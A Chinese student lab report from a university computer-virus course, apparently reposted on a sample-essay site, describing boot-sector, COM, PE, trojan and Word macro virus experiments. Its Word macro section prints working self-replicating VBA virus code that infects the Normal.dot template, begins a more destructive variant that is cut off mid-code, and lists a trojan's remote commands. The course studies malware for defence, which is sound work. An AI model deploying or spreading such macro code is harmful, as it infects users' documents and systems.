10

2025-01

当前位置: 默读范文网 > 范文大全 > 公文范文 >

计算机病毒及防治实验报告081310128王晨雨

| 浏览量:

 南京航空航天大学 计算机病毒及防治 上机实验报告

  学院:

 理学院 专业:

 信息与计算科学 学号:

 081310128 姓名:

 王晨雨 授课老师:

 薛明富

 二〇一六年十二月

 目录 实验一:引导型病毒实验.............................................. 2 实验二:Com 病毒实验 ................................................ 6 实验三:PE 文件格式实验 ............................................. 9 实验四:32 位文件型病毒实验 ........................................ 11 实验五:简单的木马实验............................................. 14 实验七:木马病毒清除实验(选做)................................... 20 实验八:Word 宏病毒实验(一)

 ...................................... 23 实验九:Word 宏病毒实验(二)

 ...................................... 29 实验十:Linux 脚本病毒实验(选做)

 ................................. 34 实验十二:基于 U 盘传播的蠕虫病毒实验............................... 35 实验十三:邮件型病毒实验........................................... 38 实验十四:Web 恶意代码实验 ......................................... 41

 实验一 :引导型病毒实验 【实验目的】

  通过实验,了解引导区病毒的感染对象和感染特征,重点学习引导病毒的感染机制和恢复感染病毒文件的方法,提高汇编语言的使用能力。

 实验内容 引导阶段病毒由软盘感染硬盘实验。通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制:阅读和分析病毒的代码。

 DOS 运行时病毒由硬盘感染软盘的实现。通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制:阅读和分析病毒的代码。

 【实验平台】

 】

 VMWare Workstation 12 PRO MS-DOS 7.10 【试验内容】

 】

 第一步:环境安装 安装虚拟机 VMWare,在虚拟机环境内安装 MS-DOS 7.10 环境。

 第二步:软盘感染硬盘 1) 运行虚拟机,检查目前虚拟硬盘是否含有病毒,图 1 表示没有病毒正常启动硬盘的状态。

 2) 在附书资源中复制含有病毒的虚拟软盘 virus.img 3) 将含有病毒的软盘插入虚拟机引导,可以看到闪动的字符*^_^*,如图 2 所示,按任意键进入图 3。

 第三步:验证硬盘已经被感染 1) 取出虚拟软盘,通过硬盘引导,再次出现了病毒的画面如图 4。

 2) 按任意键后正常引导了 DOS 系统如图 5。可见,硬盘已被感染。

 第四步:硬盘感染软盘 1) 下载 empty.img,并且将它插入虚拟机,启动计算机,由于该盘为空,如图 6. 2) 取出虚拟软盘,从硬盘启动,通过命令 format A:/q 快速格式化软盘。可能提示出错,这时只要按 R 键即可。如图 7. 3) 成功格式化后的结果如图 8。

 4) 不要取出虚拟软盘,重新启动虚拟机,这时是从 empty.img 引导,可以看到病毒的画面,如图 9。按任意键进入图 10.可见,病毒已经成功由硬盘传染给了软盘。

 实验截图:

 1. 软盘启动后:

 2. 硬盘启动后:

 实验二:Com 病毒实验 【实验目的】

  1、掌握 COM 病毒的传播原理。

 2、掌握 MASM611 编译工具的使用。

  【实验平台】

 】

  1、MS-DOS 7.10 2、MASM611

  【试验内容】

 】

  1、 安装 MS-DOS 7.10 环境。虚拟机安装该环境亦可,步骤在此不再赘述。

 2、 在 MS-DOS C:\MASM 目录下安装 MASM611,然后将 binr 目录下的 link.exe 复制到 bin目录下。

 3、 在 com 目录下复制病毒程序 Virus.asm 及测试程序源代码 BeInfected.asm 4、 编译链接 BeInfected.asm,形成 BeInfectedcom 测试程序 5、 编译链接 virus.asm,生成病毒程序 virus.exe。

 6、 在 C:\MASM\Bin 目录下建立 del.txt 文件,并且将“test.com”和病毒代码 2“virus.asm”复制到此目录下。

 7、 执行“test.com”观察结果。

 8、 编译并连接 “virus.asm” 生成“virus.exe”,执行此 exe 文件以感染“test.com”文件并且自动删除 del.txt,而后执行“test.com”可以发现感染后的结果。

 实验截图:

 1. 编译存储好文件:

  2. Dos 下查看文件夹内容:

 3. 查看 TEST 的内容:

 4. 运行病毒程序:

 5. 查看感染病毒后文件夹内容:

 6. 查看感染病毒后 TEST 的内容:

  实验三:PE 文件格式实验 【 实验目的 】

 了解 PE 文件基本结构 【 实验环境 】

 运行环境:Windows 2000、Windows 9x、Windows NT 以及 Windows XP 编译环境:

 Visual Studio 6.0 【 实验步骤 】

 使用编译环境打开源代码工程,编译后可以生成 winpe.exe。

 预备步骤:找任意一个 Win32 下的 Exe 文件作为查看对象。

 实验内容:运行 winpe.exe,并打开任一 exe 文件,选择不同的菜单,可以查看到 exe 文件的内部结构。

  实验截图:

  感染前

 感染后

  第一处:

 第二处:

  第三处:

  第四处:

  第五处:

 感染前:

 感染后:

  实验四:32 位文件型病毒实验

  【 实验目的】

 】

  了解文件型病毒的基本制造过程  了解病毒的感染、破坏机制,进一步认识病毒程序  掌握文件型病毒的特征和内在机制

 【 实验环境】

 】

 运行环境 Windows 2000、Windows 9x、Windows NT 和 Windows XP

 【 实验步骤】

 】

 目录中的 virus.rar 包中包括 Virus.exe(编译的病毒程序)、软件使用说明书.doc(请仔细阅读)、源代码详解.doc(对代码部分加入了部分注释)以及 pll.asm(程序源代码)。Example.rar包中选取的是一个常用程序(ebookedit)安装后的安装目录下的程序,用于测试病毒程序。

 预备步骤:将 example.rar 解压到某个目录。解压完毕后,应该在该目录下有 Buttons目录、ebookcode.exe、ebookedit.exe、ebrand-it.exe 以及 keymaker.exe 等程序,然后把virus.rar 包解压后的 Virus.exe 复制到该目录中。

 实验内容:通过运行病毒程序观看各步的提示以了解病毒的内在机制。

 实验截图:

 1.感染前准备:

  2.感染过程:

 3.感染后:

  4.感染文件比对

  实验五:简单的木马实验 【 实验目的】

 】

 掌握木马的基本原理 【 实验环境】

 】

  Windows XP 操作系统  Visual Studio 6.0 编程环境 【 实验步骤】

 】

 (1)

 复制实验文件到实验的计算机上。其中,SocketListener 目录下是木马 Server 端源代码,SocketCommand 目录下是木马 Client 端源代码。

 (2)

 用 Visual Studio 6.0 环境分别编译这两部分代码。

 (3)

 运行 SocketListener 应用程序,也就是启动了木马被控端。

 (4)

 运行 SocketCommand 应用程序,也就是启动了木马的控制端,可以在控制端执行命令来控制被控制端。实验支持的命令参考表:

  命令 命令含义 CMD 执行应用程序 !SHUT 退出木马 FILEGET 获得远程文件 EDITCONF 编辑配置文件 LIST 列目录 VIEW 查看文件内容 CDOPEN 关 CD CDCLOSE 开 CD REBOOT 重启远端计算机

 实验截图:

 1.建立连接:

 2.发送指令及成功后结果:

 (1)

 运行程序:

 (2)

 关闭木马:

 (3)

 获得文件:

 (4)

 编辑配置文件:

 (5)

 查看文件:

  (6)

 查看文件内容:

  (7)

 重启计算机:

  实验七 :木马病毒清除实验(选做)

 【 实验目的】

 】

 掌握木马病毒清除的基本原理 【 实验平台】

 】

  Windows 32 位操作系统  Visual Studio 7.0 编译环境 【 实验步骤】

 】

 文件 Antitrojan.sln 为工程文件。使用 Visual Studio 编译该工程,生成 Antitrojan.exe 可执行程序。执行 Antitrojan.exe 观察执行效果。

 实验截图:

 1. 确认木马存在:

 2. 进行编译:

  (1)

 修改试验机名字:

 (2)

 添加查杀代号:

 (3)

 添加查杀代码:

 3. 清除成功:

  实验八:

 :Word 宏病毒实验 (一)

 实验目的

 Word 宏是指能组织到一起为独立命令使用的一系列 Word 指令,它能使日常工作变得容易。本实验演示了宏的编写,通过两个简单的宏病毒示例,说明宏的原理及其安全漏洞和缺陷,理解宏病毒的作用机制,从而加强对宏病毒的认识,提高防范意识。

 实验所需条件和环境

 硬件设备:局域网,终端 PC 机。

 系统软件:Windows 系列操作系统 支撑软件:Word 2003 软件设置:关闭杀毒软;打开 Word 2003,在工具宏安全性中,将安全级别设置为低,在可靠发行商选项卡中,选择信任任何所有安装的加载项和模板,选择信任 visual basic 项目的访问 实验环境配置如下图所示:

 受感染终端受感染Word文档被感染终端 宏病毒传播示意图 实验内容和分析

 为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的 word 文档,否则清除比较麻烦(对每个打开过的文档都要清除)。

  例 例 1 自我复制,感染 word 公用模板和当前文档 代码如下:

 "Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then

  Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With Host

  If .Lines(1.1) <> ""Micro-Virus" Then

  .DeleteLines 1, .CountOfLines

  .InsertLines 1, Ourcode

  .ReplaceLine 2, "Sub Document_Close()"

  If ThisDocument = nomaltemplate Then

 .ReplaceLine 2, "Sub Document_Open()"

  ActiveDocument.SaveAs ActiveDocument.FullName

  End If

  End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打开一个 word 文档,然后按 Alt+F11 调用宏编写窗口(工具宏Visual Basic宏编辑器),在左侧的 project—>Microsoft Word 对象ThisDocument 中输入以上代码,保存,此时当前 word 文档就含有宏病毒,只要下次打开这个 word 文档,就会执行以上代码,并将自身复制到 Normal.dot(word 文档的公共模板)和当前文档的 ThisDocument 中,同时改变函数名(模板中为 Document_Close,当前文档为 Document_Open),此时所有的 word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响 word 的正常使用,本例中只是简单的跳出一个提示框。

  代码解释 以上代码的基本执行流程如下:

 1) 进行必要的自我保护 Application.DisplayStatusBar = False

 Options.SaveNormalPrompt = False 高明的病毒编写者其自我保护将做得非常好,可以使 word 的一些工具栏失效,例如将工具菜单中的宏选项屏蔽,也可以修改注册表达到很好的隐藏效果。

 本例中只是屏蔽状态栏,以免显示宏的运行状态,并且修改公用模板时自动保存,不给用户提示。

 2) 得到当前文档的代码对象和公用模板的代码对象 Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then

  Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If

 3) 检查模板是否已经感染病毒,如果没有,则复制宏病毒代码到模板,并且修改函数名。

 With Host

  If .Lines(1.1) <> ""Micro-Virus" Then

  .DeleteLines 1, .CountOfLines

  .InsertLines 1, Ourcode

  .ReplaceLine 2, "Sub Document_Close()"

  If ThisDocument = nomaltemplate Then

 .ReplaceLine 2, "Sub Document_Open()"

  ActiveDocument.SaveAs ActiveDocument.FullName

  End If

  End If End With 4) 执行恶意代码 MsgBox "MicroVirus by Content Security Lab"

 实验截图

 :

 1.复制代码

 2.感染病毒后现象

 3.感染其他文档

  实验九:

 :Word 宏病毒实验( 二)

 )

 例 例 2 具有一定破坏性的宏 我们可以对上例中的恶意代码稍加修改,使其具有一定的破坏性(这里以著名宏病毒“台湾一号”的恶意代码部分为基础,为使其在 word2003 版本中运行,且降低破坏性,对源代码作适当修改)。

 完整代码如下:

 "moonlight Dim nm(4) Sub Document_Open() "DisableInput 1

 Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule

  Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then

  Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With host If .Lines(1, 1) <> ""moonlight" Then

 .DeleteLines 1, .CountOfLines .InsertLines 1, ourcodemodule.Lines(1, 100) .ReplaceLine 3, "Sub Document_Close()"

  If ThisDocument = NormalTemplate Then

  .ReplaceLine 3, "Sub Document_Open()"

  ActiveDocument.SaveAs ActiveDocument.FullName

  End If

 End If

 End With

 Count = 0 If Day(Now()) = 1 Then try:

  On Error GoTo try

  test = -1

  con = 1

 tog$ = ""

  i = 0

  While test = -1

  For i = 0 To 4

  nm(i) = Int(Rnd() * 10)

  con = con * nm(i)

  ...

相关热词搜索: 计算机病毒 防治 实验